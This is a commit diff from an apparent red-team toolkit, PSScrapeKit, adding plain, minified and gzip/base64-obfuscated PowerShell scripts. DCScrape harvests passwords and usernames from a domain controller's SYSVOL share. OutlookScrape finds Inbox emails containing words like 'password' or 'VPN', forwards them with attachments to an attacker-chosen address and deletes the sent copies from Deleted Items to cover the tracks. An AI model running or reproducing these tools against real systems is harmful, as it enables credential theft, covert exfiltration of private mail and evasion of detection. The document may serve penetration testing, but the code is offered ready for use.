Better minification of source script

PSScrapeKit/DCScrape.min.gzip.ps1

@@ -0,0 +1 @@
+$([ScriptBlock]::Create(([IO.StreamReader]::new(([IO.Compression.GZipStream]::new([IO.MemoryStream]::new([Convert]::FromBase64String('H4sIAAAAAAAAE+VYa0sbQRS9P2Uqglk1i6XfEpZWrFppjWJ8UGIoNsZXo5FkYxXNf++5d2eyu/NYLdhCKWHNzsx9nHvmzCPO0yXd4EnxnNCAPlOfHugnDWlEpzSmhD5QjRboFqNjfMzIAi3j6QX6815jN0JcM7rr9VkLxNq1Yq1Vxmo4CMr9tn0SsA/1q2DlyvFQVvUqgEEFGXA9lMVCKGbDg8cecbkI+SQV2MOZVEUuVZHNjEXUpHmMneKTKXQIrVapdIL3PvqyuKbFPtd4y3rLrYOSx4HXo+X1MDaNQLZGwD4J2Nv9KmCnrDqUlcdu23atgF+OO5S5EfRJgj5JBZ5wJlWRS1VkKyvnGr0pVt8FRsa0AbVMYMlqnqcz0RF7s+Upxtia90Ie7eP7DhgOqE3rtEcfwVobf3dom1ZpCy3ba020mQLLEHEHgiqBJjvwe0CeFD3XFCPGpazcHnpYvQ8YZ9s79PcEZ4wMPVH7HdquPcfI83aBskGbsEiBYQKLkaBPS1Y1MBJZnj7EY3oSPAOdsY6Kv9OVbim0NwTPWFpvhYUbyT1AlHOJuCusX6D6OTrGZx7Zn+cqnukygk+bvuI5RPYvEqHoPYesWb11RLpA3wDjW5phxmgQqAp0bLcndU2knv6sOsbzREeiGubS5uARUb8V8NYRdSjzdaN3oU3saCntY/QW0WIZOdOK3QSCffSxhrZ0H+M4h9VYOOEZvhVmWMdTYNmQmV9HPtayD09PM5rNfFLgp9ivNPIN1My8mwqaQDeUWrMMPF8DQc2s8LdyckSSt7zCeOVU3yae49VkraMvj82op0B5CZw1J6sPSXmtM6sTqfMIb5dSQ50+wSbT8RxWtfFWwkXma2o/06pQWss+DiN6I8os8nSPv208J8jKs9LRKC/0quWs94i4AhUojJ7I6j0BY9n4lqDgODu68vIcLAsiw1kkClb0Tu9+ZRzrmg0XQ7Y/vEb2Jcm+7FFLLEqcaBXWZe/woUwcz04FozE+/jq7L745lJXyEo/nNFzGUxeGfqA1R4uinUW8TQWfe1bmfNr7cFtUzGPnhT0u1f585tXoPcYjJ+ox2ovgsYH4Xd2qgbkl2C5IrFVR8nZpBb1k1+F1UPaKsfOMhNFbtDqY5S76DoVHXoH5Ku7o3S6ryChujPWUrasdyX0tO+mDqM+uK9Ir38eiPQdXaHOmBWEqY9+9474G+/zdcGI/FXqeZr8HotncJPDJ54bPv39tduyKzez4WC6v8P+V67/FttE05+sImp6smVTuVMNCLV3cXx5nd6BWYT0V7ztN5+wzFu69YlffXfuyq3J1axX7/b3s9yuyr9eckdhzItlnH58qvPfnc5Fl/aLtinw0cQ8byZ1y8GJsv49qSaMK1eQ7F7mC1T9yduUeTc9vOHcvbXr+R+CqbFpSs7kPq4pbGas1dBdr4V1ZnsVbWSzn55R+AbxPkLC6EgAA')),[IO.Compression.CompressionMode]'Decompress')),[Text.Encoding]::unicode)).ReadToEnd()))

PSScrapeKit/DCScrape.min.ps1

@@ -0,0 +1 @@
+$initialKeywords=@('password','cpassword','passw','cred','Password','Cpassword','Passw','Cred','Password:','password:','Password=','password=','password ','cpassword ','passw ','cred ','Password ','Cpassword ','Passw ','Cred ','Password: ','password: ','Password= ','password= ','Password : ','password : ','Password = ','password = ');$additionalKeywords=@('user','username','name','User','Username','Name','Username:','username:','Username=','username=','user ','username ','name ','User ','Username ','Name ','Username: ','username: ','Username= ','username= ','Username : ','username : ','Username = ','username = ');$matchesFound=$false;$domain=$env:USERDNSDOMAIN;$domainController=([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).DomainControllers|Select-Object -First 1;$netlogonPath="\\$($domainController.Name)\SYSVOL\$domain";Get-ChildItem -Path $netlogonPath -Recurse -File|Where-Object {$_.Name-notin@('GptTmpl.inf','GPT.INI','Registry.pol')}|ForEach-Object {$content=Get-Content $_.FullName;foreach($line in $content){$matches=$initialKeywords|Where-Object {$line-cmatch$_};if($matches){$matchesFound=$true;Write-Host "Match found in file $($_.FullName)!";$contextStart=[math]::Max(0, [array]::IndexOf($content, $line) - 3);$contextEnd=[math]::Min([array]::IndexOf($content, $line) + 3, $content.Count - 1);$context=$content[$contextStart..$contextEnd];$additionalKeywordsFound=$additionalKeywords|Where-Object {$context-like"*$_*"};$username=$line|Select-String -Pattern '(?i)username\s*[:=]\s*(.+)' -AllMatches|ForEach-Object {$_.Matches.Groups[1].Value};if([string]::IsNullOrEmpty($username)){$username=$context-join' '};$password=$line|Select-String -Pattern '(?i)(?:password|passw|cred)\s*[=:]\s*(\S+)' -AllMatches|ForEach-Object {$_.Matches.Groups[1].Value};if([string]::IsNullOrEmpty($password)){$password=$content|Select-String -Pattern '(?i)(?:password|passw|cred)\s*[=:]\s*(\S+)' -AllMatches|ForEach-Object {$_.Matches.Groups[1].Value}};if([string]::IsNullOrEmpty($password)){$password=$line};[pscustomobject]@{FileName=$_.Name;FullName=$_.FullName;PrecedingContext=$context[0..($context.IndexOf($line) - 1)];MatchingLine=$line;TrailingContext=$context[($context.IndexOf($line) + 1)..($context.Count - 1)];AdditionalKeywordsFound=$additionalKeywordsFound;Username=$username;Password=$password}}};if(-not $matchesFound){Write-Host "No matches found."}}

PSScrapeKit/DCScrape.ps1

@@ -1,4 +1,54 @@
 # LaresLLC PSScrapingKit 2023
 # Neil Lines & Andy Gill
 # v1.0 Release
-$domain = $env:USERDNSDOMAIN; $domainController = ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).DomainControllers | Select-Object -First 1 ; $netlogonPath = "\\$($domainController.Name)\SYSVOL\$domain";$initialKeywords=@('password','cpassword','passw','cred','Password','Cpassword','Passw','Cred','Password:','password:','Password=','password=' ,'password ','cpassword ','passw ','cred ','Password ','Cpassword ','Passw ','Cred ','Password: ','password: ','Password= ','password= ','Password : ','password : ','Password = ','password = ');$additionalKeywords=@('user','username','name','User','Username','Name','Username:','username:','Username=','username=','user ','username ','name ','User ','Username ','Name ','Username: ','username: ','Username= ','username= ' ,'Username : ','username : ','Username = ','username = ');$matchesFound=$false;Get-ChildItem -Path $netlogonPath -Recurse -File | Where-Object { $_.Name -notin @('GptTmpl.inf','GPT.INI','Registry.pol') } | ForEach-Object { $content=Get-Content $_.FullName;foreach($line in $content){$matches=$initialKeywords|Where-Object{ $line -cmatch $_ };if($matches){$matchesFound=$true;Write-Host "Match found in file $($_.FullName)!";$contextStart=[Math]::Max(0,[Array]::IndexOf($content,$line)-3);$contextEnd=[Math]::Min([Array]::IndexOf($content,$line)+3,$content.Count-1);$context=$content[$contextStart..$contextEnd];$additionalKeywordsFound=$additionalKeywords|Where-Object{ $context -like "*$_*" };$username=$line|Select-String -Pattern '(?i)username\s*[:=]\s*(.+)' -AllMatches|ForEach-Object{ $_.Matches.Groups[1].Value };if([string]::IsNullOrEmpty($username)){$username=$context -join ' '};$password=$line|Select-String -Pattern '(?i)(?:password|passw|cred)\s*[=:]\s*(\S+)' -AllMatches|ForEach-Object{ $_.Matches.Groups[1].Value };if([string]::IsNullOrEmpty($password)){$password=$content|Select-String -Pattern '(?i)(?:password|passw|cred)\s*[=:]\s*(\S+)' -AllMatches|ForEach-Object{ $_.Matches.Groups[1].Value }};if([string]::IsNullOrEmpty($password)){$password=$line};[PSCustomObject]@{FileName=$_.Name;FullName=$_.FullName;PrecedingContext=$context[0..($context.IndexOf($line)-1)];MatchingLine=$line;TrailingContext=$context[($context.IndexOf($line)+1)..($context.Count-1)];AdditionalKeywordsFound=$additionalKeywordsFound;Username=$username;Password=$password}}};if(-not $matchesFound){Write-Host "No matches found.";}}
+# ----------------------------------------------------------
+# Vars
+$initialKeywords = @('password', 'cpassword', 'passw', 'cred', 'Password', 'Cpassword', 'Passw', 'Cred', 'Password:', 'password:', 'Password=', 'password=', 'password ', 'cpassword ', 'passw ', 'cred ', 'Password ', 'Cpassword ', 'Passw ', 'Cred ', 'Password: ', 'password: ', 'Password= ', 'password= ', 'Password : ', 'password : ', 'Password = ', 'password = ')
+$additionalKeywords = @('user', 'username', 'name', 'User', 'Username', 'Name', 'Username:', 'username:', 'Username=', 'username=', 'user ', 'username ', 'name ', 'User ', 'Username ', 'Name ', 'Username: ', 'username: ', 'Username= ', 'username= ', 'Username : ', 'username : ', 'Username = ', 'username = ')
+$matchesFound = $false
+# ----------------------------------------------------------
+# Setup and retrieve system information
+$domain = $env:USERDNSDOMAIN
+$domainController = ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).DomainControllers | Select-Object -First 1
+$netlogonPath = "\\$($domainController.Name)\SYSVOL\$domain"
+# ----------------------------------------------------------
+# Enumerate
+Get-ChildItem -Path $netlogonPath -Recurse -File | Where-Object { $_.Name -notin @('GptTmpl.inf', 'GPT.INI', 'Registry.pol') } | ForEach-Object {
+  $content = Get-Content $_.FullName
+  foreach ($line in $content) {
+    $matches = $initialKeywords | Where-Object { $line -cmatch $_ }
+    if ($matches) {
+      $matchesFound = $true
+      Write-Host "Match found in file $($_.FullName)!"
+      $contextStart = [math]::Max(0, [array]::IndexOf($content, $line) - 3)
+      $contextEnd = [math]::Min([array]::IndexOf($content, $line) + 3, $content.Count - 1)
+      $context = $content[$contextStart..$contextEnd]
+      $additionalKeywordsFound = $additionalKeywords | Where-Object { $context -like "*$_*" }
+      $username = $line | Select-String -Pattern '(?i)username\s*[:=]\s*(.+)' -AllMatches | ForEach-Object { $_.Matches.Groups[1].Value }
+      if ([string]::IsNullOrEmpty($username)) {
+        $username = $context -join ' '
+      }
+      $password = $line | Select-String -Pattern '(?i)(?:password|passw|cred)\s*[=:]\s*(\S+)' -AllMatches | ForEach-Object { $_.Matches.Groups[1].Value }
+      if ([string]::IsNullOrEmpty($password)) {
+        $password = $content | Select-String -Pattern '(?i)(?:password|passw|cred)\s*[=:]\s*(\S+)' -AllMatches | ForEach-Object { $_.Matches.Groups[1].Value }
+      }
+      if ([string]::IsNullOrEmpty($password)) {
+        $password = $line
+      }
+      [pscustomobject]@{
+        FileName                = $_.Name
+        FullName                = $_.FullName
+        PrecedingContext        = $context[0..($context.IndexOf($line) - 1)]
+        MatchingLine            = $line
+        TrailingContext         = $context[($context.IndexOf($line) + 1)..($context.Count - 1)]
+        AdditionalKeywordsFound = $additionalKeywordsFound
+        Username                = $username
+        Password                = $password
+      }
+    }
+  }
+
+  if (-not $matchesFound) {
+    Write-Host "No matches found."
+  }
+}

PSScrapeKit/Minify.ps1

@@ -0,0 +1,10 @@
+Import-Module PSMinifier
+
+Get-ChildItem -Filter DCScrape.ps1 | Get-Command { $_.FullName } | Compress-ScriptBlock -NoBlock -OutputPath DCScrape.min.ps1
+Write-Output "[*] MINIFIED: DCScrape.ps1      -> DCScrape.min.ps1"
+Get-ChildItem -Filter DCScrape.ps1 | Get-Command { $_.FullName } | Compress-ScriptBlock -NoBlock -GZip -OutputPath DCScrape.min.gzip.ps1
+Write-Output "[*] GZIPPED:  DCScrape.ps1      -> DCScrape.min.gzip.ps1"
+Get-ChildItem -Filter OutlookScrape.ps1 | Get-Command { $_.FullName } | Compress-ScriptBlock -NoBlock -OutputPath OutlookScrape.min.ps1
+Write-Output "[*] MINIFIED: OutlookScrape.ps1 -> OutlookScrape.min.ps1"
+Get-ChildItem -Filter OutlookScrape.ps1 | Get-Command { $_.FullName } | Compress-ScriptBlock -NoBlock -GZip -OutputPath OutlookScrape.min.gzip.ps1
+Write-Output "[*] GZIPPED:  OutlookScrape.ps1 -> OutlookScrape.min.gzip.ps1"

PSScrapeKit/OutlookScrape.min.gzip.ps1

@@ -0,0 +1 @@
+$([ScriptBlock]::Create(([IO.StreamReader]::new(([IO.Compression.GZipStream]::new([IO.MemoryStream]::new([Convert]::FromBase64String('H4sIAAAAAAAAE61YbW/TSBDen2JZfIiBRFDpvrSKdIUm0DtRKsJdP5xQcRuHGpI0ZyctFeS/88yMX3bttb2uUOV0Pe87Mzsz64XaqbW6VlsVq1usPHWK3zusv6lIDdV74LdqiXeCzECZqFBtgPuhngCmY8fqDPB75rpSX7EmuR7eXwO/qkBNySN1DKkbvMfAh4U9R9CyxvsKfCnwIbARNFV1j9QbwLewoEo7UL56B+nn2JmvApa4AM9SzYFNQDm26hipqUFFfDHorgD9buBynWPIPy0ofOZIAV/DrlM8EajSRs5ZRulptCKDaJe8uwjrbkknBn1dnn0XZDmtvmf+2AGzdNhDM5+L3c3cZox+MleiJhydm1qO/ahwkLTLzPodKKe1iOvUtljb+FysqPPltsTQObBSjIr4DfH835lpAWtyiaNN14SjmagH0J6ofU/L3DI6yHzhnjm/39I+50bs7Z+xLlbvDcu7ojaERbR2917J0c/+ahY11UGprLqMKR6q6LQ/lz0FDXXk8RpdfRO0VqLH6+/rabLiDvKpv83V34A+oFNSLZmjhmyKfpdyBX+J5zmeg6xif2ukJ2qiuUc1itmiQSs9deM1VluOmedsFeXKBeAx73So3gKecs2TzrUsaqCp28P/Us4h29ok5yU876l/OLYJcOS7BdspfcyUnLbKOmBZJywh5K5Sty0FZMBRT/GXQ58DmvJudpnsB4Zd8w4W7CnJvZg9R7h/MV2c8eoCUZ/iCRwi9wG4EFDTcqke5AEP/2+wavepz9Wlqony6E/sLtAqT7MtUjEl79oirdtm8+Utx8rj+ZBolln0Ao7GOWAR+9ozJElehvxLp2jDPi+5yQ+3+JVciMF/A3n1rKeauytquWkfncUNT4wufg9r+/MLP/7HHAnb8kV9Qk4fQnqK+Mvs8h64C7aLpM20ObTZpoBtvmL/hKCyR/QZ16smGdRl6BxS7rpH/CCLuC1//NrZkKpUPR0CbTofgpUTIuv8jOSZu2Dp96AmHR/xNkEWhBzZPqdkztklla28QUhOiTSPJc21PBTdXsUGiW0+Levdoux0I63qm3QuU2Kk7TCfVBd8p1nXKnFqiTtpueB9Jyrq0DBCFu40/JBPFsnz1VPW/hSrIUs2+V4BNodWO4c+1TTbHmhTcW7BuNW+clYo52eTusSVmXJsRJZkJCwvRhbHWUamNVmUbS7xuuQbqq5Bcvcq81BVbu65en5PjMhXb7GvsxpAuZTn10C90O6tNklVD475zktSrrkSUTZ7Gr3c8kXaSjsrhzwRmLHyOzS/KjzgG5HJZZWQz1h9sMREKG3RIg56Sj93WUPxHHfUlHYJ+u35GHRSZcS/Kz7lY63XHFXifgzMNsujVbEPlwwLLZxlbdhmnfGc6W6A+QsSY67kOcwz1k9Yxh28+xF63wEjX2KkY84NSptuuhNLb83vSEeNlDNA7thfacE1sFjdlcV27+Unzy7R1kMmlmphzkJ9bQiKLwx9uFwri55zA97TvmW2rZ9svcOVlZhmrqlhsczReb/UuWJrPcgnr/bzRGdyxrtPuLvMeC8RouTxW5TNBjIl/sHxWlX2UPZS8+vVuOWupXfgrm54aemC+fcMHbrvZd3j4/u46KbFbL3ieVnybMnTsuklygO5sZbxbv4u6Blfw/zsm8Ve/QIRedNyHhYAAA==')),[IO.Compression.CompressionMode]'Decompress')),[Text.Encoding]::unicode)).ReadToEnd()))

PSScrapeKit/OutlookScrape.min.ps1

@@ -0,0 +1 @@
+function Invoke-OutlookScrape{$outlook=New-Object -ComObject Outlook.Application;$namespace=$outlook.GetNamespace("MAPI");$folders=$namespace.Folders;$inboxFolderName="Inbox";$sentItemsFolderName="Sent Items";$deletedItemsFolderName="Deleted Items";$inboxFolderIndex=$null;$sentItemsFolderIndex=$null;$deletedItemsFolderIndex=$null;$folders|ForEach-Object {$folder=$_;$subFolders=$folder.Folders;$subFolders|ForEach-Object {$subFolder=$_;if($subFolder.Name-eq$inboxFolderName){$inboxFolderIndex=$subFolder.EntryID};if($subFolder.Name-eq$sentItemsFolderName){$sentItemsFolderIndex=$subFolder.EntryID};if($subFolder.Name-eq$deletedItemsFolderName){$deletedItemsFolderIndex=$subFolder.EntryID}}};if($inboxFolderIndex-and$sentItemsFolderIndex-and$deletedItemsFolderIndex){$inbox=$namespace.GetFolderFromID($inboxFolderIndex);$sentItems=$namespace.GetFolderFromID($sentItemsFolderIndex);$deletedItems=$namespace.GetFolderFromID($deletedItemsFolderIndex);$validKeywordOptions="1","2";$keywordOption="";while($keywordOption -notin $validKeywordOptions){Write-Host "Select keyword option:";Write-Host "1. User-defined keywords";Write-Host "2. Default keywords (password, security, confidential, VPN, WIFI)";$keywordOption=Read-Host "Enter the keyword option"};$keywords=@();if($keywordOption-eq"1"){Write-Host "Enter keywords (one per line). Press Enter on an empty line to finish.";while($true){$keywordInput=Read-Host "Enter a keyword";if([string]::IsNullOrWhiteSpace($keywordInput)){break};$keywords+=$keywordInput}}elseif($keywordOption-eq"2"){$keywords="password","security","confidential","VPN","WIFI"};$forwardToEmail=Read-Host "Enter the destination email address for forwarding";$items=$inbox.Items;$items|ForEach-Object {$email=$_;$foundKeywords=$keywords|Where-Object {$email.Subject-like"*$_*"-or$email.Body-like"*$_*"};if($foundKeywords){$subject=$email.Subject;$sender=$email.SenderEmailAddress;$recipients=$email.To|ForEach-Object {$_.Address};$body=$email.Body;$forwardEmail=$outlook.CreateItem(0);$forwardEmail.Subject="Matching Email Information: $subject";$forwardEmail.Body="Sender: $sender`nRecipients: $recipients`n`n$body";$forwardEmail.To=$forwardToEmail;$forwardEmail.DeleteAfterSubmit=$true;$email.Attachments|ForEach-Object {$attachment=$_;$tempPath=Join-Path -Path $env:TEMP -ChildPath $attachment.FileName;$attachment.SaveAsFile($tempPath);$forwardEmail.Attachments.Add($tempPath)};$forwardEmail.Send();if($forwardEmail.Attachments){$forwardEmail.Attachments|ForEach-Object {$_.Delete()}};Write-Host "Matching email found. Forwarded the email information to $forwardToEmail";Start-Sleep -Seconds 5;$matchingItemsDeleted=$deletedItems.Items|Where-Object {$_.Subject-eq$subject};$matchingItemsDeleted|ForEach-Object {$_.Delete()};Write-Host "Matching emails permanently deleted from the Deleted Items folder"}}}}

PSScrapeKit/OutlookScrape.ps1

@@ -70,35 +70,35 @@ function Invoke-OutlookScrape {
         $items | ForEach-Object {
             $email = $_
             $foundKeywords = $keywords | Where-Object { $email.Subject -like "*$_*" -or $email.Body -like "*$_*" }
-        
+
             if ($foundKeywords) {
                 $subject = $email.Subject
                 $sender = $email.SenderEmailAddress
                 $recipients = $email.To | ForEach-Object { $_.Address }
                 $body = $email.Body
-            
+
                 $forwardEmail = $outlook.CreateItem(0)
                 $forwardEmail.Subject = "Matching Email Information: $subject"
                 $forwardEmail.Body = "Sender: $sender`nRecipients: $recipients`n`n$body"
                 $forwardEmail.To = $forwardToEmail
                 $forwardEmail.DeleteAfterSubmit = $true
-            
+
                 $email.Attachments | ForEach-Object {
                     $attachment = $_
                     $tempPath = Join-Path -Path $env:TEMP -ChildPath $attachment.FileName
                     $attachment.SaveAsFile($tempPath)
                     $forwardEmail.Attachments.Add($tempPath)
                 }
-            
+
                 $forwardEmail.Send()
-            
+
                 if ($forwardEmail.Attachments) {
                     $forwardEmail.Attachments | ForEach-Object { $_.Delete() }
                 }
-            
+
                 Write-Host "Matching email found. Forwarded the email information to $forwardToEmail"
                 Start-Sleep -Seconds 5
-            
+
                 $matchingItemsDeleted = $deletedItems.Items | Where-Object { $_.Subject -eq $subject }
                 $matchingItemsDeleted | ForEach-Object { $_.Delete() }
                 Write-Host "Matching emails permanently deleted from the Deleted Items folder"

PSScrapeKit/README.md

@@ -0,0 +1,18 @@
+# PSScrapeKit
+
+To compile, install the following Powershell Module:
+
+```powershell
+Install-Module PSMinifier
+```
+
+Then run the `Minify.ps1` script within the PSScrapeKit directory:
+
+```
+PS /Users/alex/Code/ScrapingKit/PSScrapeKit> ./Minify.ps1
+[*] MINIFIED: DCScrape.ps1      -> DCScrape.min.ps1
+[*] GZIPPED:  DCScrape.ps1      -> DCScrape.min.gzip.ps1
+[*] MINIFIED: OutlookScrape.ps1 -> OutlookScrape.min.ps1
+[*] GZIPPED:  OutlookScrape.ps1 -> OutlookScrape.min.gzip.ps1
+PS /Users/alex/Code/ScrapingKit/PSScrapeKit>
+```